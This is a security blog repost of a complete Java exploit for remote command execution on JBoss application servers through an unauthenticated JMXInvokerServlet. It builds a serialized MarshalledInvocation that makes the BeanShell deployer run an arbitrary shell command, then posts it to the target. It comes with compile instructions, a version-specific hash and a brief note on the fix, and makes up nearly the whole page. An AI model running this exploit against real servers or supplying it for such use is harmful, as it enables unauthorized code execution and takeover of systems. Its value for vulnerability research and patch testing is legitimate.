JBoss JMXInvokerServlet Remote Command Execution

暗月博客 2019年11月21日21:46:49评论369 views字数 5086阅读16分57秒阅读模式
/*  * JBoss JMXInvokerServlet Remote Command Execution  * JMXInvoker.java v0.3 - Luca Carettoni @_ikki  *  * This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...).  * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation"  * serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console"  * and the "JMX Console" are protected or disabled.  *  * [FAQ]  *  * Q: Is my target vulnerable?  * A: If http://<target>:8080/invoker/JMXInvokerServlet exists, it's likely exploitable  *  * Q: How to fix it?  * A: Enable authentication in "jmx-invoker-service.xml"  *  * Q: Is this exploit version-dependent?  * A: Unfortunately, yes. An hash value is used to properly invoke a method.   *    At least comparing version 4.x and 5.x, these hashes are different.  *  * Q: How to compile and launch it?  * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java  *    java  -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker  *    Yes, it's a Java exploit. I can already see some of you complaining....  */  import java.io.BufferedReader; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import java.io.ObjectOutputStream; import java.lang.reflect.Array; import java.lang.reflect.Field; import java.lang.reflect.Method; import java.net.ConnectException; import java.net.HttpURLConnection; import java.net.URL; import javax.management.MalformedObjectNameException; import javax.management.ObjectName; import org.jboss.invocation.MarshalledInvocation; //within jboss.jar (look into the original JBoss installation dir)  public class JMXInvokerServlet {      //---------> CHANGE ME <---------     static final int hash = 647347722; //Weaponized against JBoss 4.0.3SP1     static final String url = "http://127.0.0.1:8080/invoker/JMXInvokerServlet";     static final String cmd = "touch /tmp/exectest";     //-------------------------------      public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException {          System.out.println("/n--[ JBoss JMXInvokerServlet Remote Command Execution ]");          //Create a malicious Java serialized object         MarshalledInvocation payload = new MarshalledInvocation();         payload.setObjectName(new Integer(hash));          //Executes the MBean invoke operation         Class<?> c = Class.forName("javax.management.MBeanServerConnection");         Method method = c.getDeclaredMethod("invoke", javax.management.ObjectName.class, java.lang.String.class, java.lang.Object[].class, java.lang.String[].class);         payload.setMethod(method);          //Define MBean's name, operation and pars         Object myObj[] = new Object[4];         //MBean object name         myObj[0] = new ObjectName("jboss.deployer:service=BSHDeployer");         //Operation name         myObj[1] = new String("createScriptDeployment");         //Actual parameters         myObj[2] = new String[]{"Runtime.getRuntime().exec(/"" + cmd + "/");", "Script Name"};         //Operation signature         myObj[3] = new String[]{"java.lang.String", "java.lang.String"};          payload.setArguments(myObj);         System.out.println("/n--[*] MarshalledInvocation object created");         //For debugging - visualize the raw object         //System.out.println(dump(payload));          //Serialize the object         try {             //Send the payload             URL server = new URL(url);             HttpURLConnection conn = (HttpURLConnection) server.openConnection();             conn.setRequestMethod("POST");             conn.setDoOutput(true);             conn.setDoInput(true);             conn.setUseCaches(false);             conn.setRequestProperty("Accept", "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2");             conn.setRequestProperty("Connection", "keep-alive");             conn.setRequestProperty("User-Agent", "Java/1.6.0_06");             conn.setRequestProperty("Content-Type", "application/octet-stream");             conn.setRequestProperty("Accept-Encoding", "x-gzip,x-deflate,gzip,deflate");             conn.setRequestProperty("ContentType", "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation");              ObjectOutputStream wr = new ObjectOutputStream(conn.getOutputStream());             wr.writeObject(payload);             System.out.println("/n--[*] MarshalledInvocation object serialized");             System.out.println("/n--[*] Sending payload...");             wr.flush();             wr.close();              //Get the response             InputStream is = conn.getInputStream();             BufferedReader rd = new BufferedReader(new InputStreamReader(is));             String line;             StringBuffer response = new StringBuffer();             while ((line = rd.readLine()) != null) {                 response.append(line);             }             rd.close();              if (response.indexOf("Script Name") != -1) {                 System.out.println("/n--[*] /"" + cmd + "/" successfully executed");             } else {                 System.out.println("/n--[!] An invocation error occured...");             }         } catch (ConnectException cex) {             System.out.println("/n--[!] A connection error occured...");         } catch (IOException ex) {             ex.printStackTrace();         }     }      /*      * Raw dump of generic Java Objects      */     static String dump(Object o) {         StringBuffer buffer = new StringBuffer();         Class oClass = o.getClass();          if (oClass.isArray()) {             buffer.append("[");              for (int i = 0; i < Array.getLength(o); i++) {                 if (i > 0) {                     buffer.append(",/n");                 }                 Object value = Array.get(o, i);                 buffer.append(value.getClass().isArray() ? dump(value) : value);             }             buffer.append("]");         } else {             buffer.append("{");             while (oClass != null) {                 Field[] fields = oClass.getDeclaredFields();                 for (int i = 0; i                         < fields.length; i++) {                     if (buffer.length() > 1) {                         buffer.append(",/n");                     }                     fields[i].setAccessible(true);                     buffer.append(fields[i].getName());                     buffer.append("=");                     try {                         Object value = fields[i].get(o);                         if (value != null) {                             buffer.append(value.getClass().isArray() ? dump(value) : value);                         }                     } catch (IllegalAccessException e) {                     }                 }                 oClass = oClass.getSuperclass();             }             buffer.append("}");         }         return buffer.toString();     } } 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日21:46:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   JBoss JMXInvokerServlet Remote Command Executionhttp://cn-sec.com/archives/72226.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息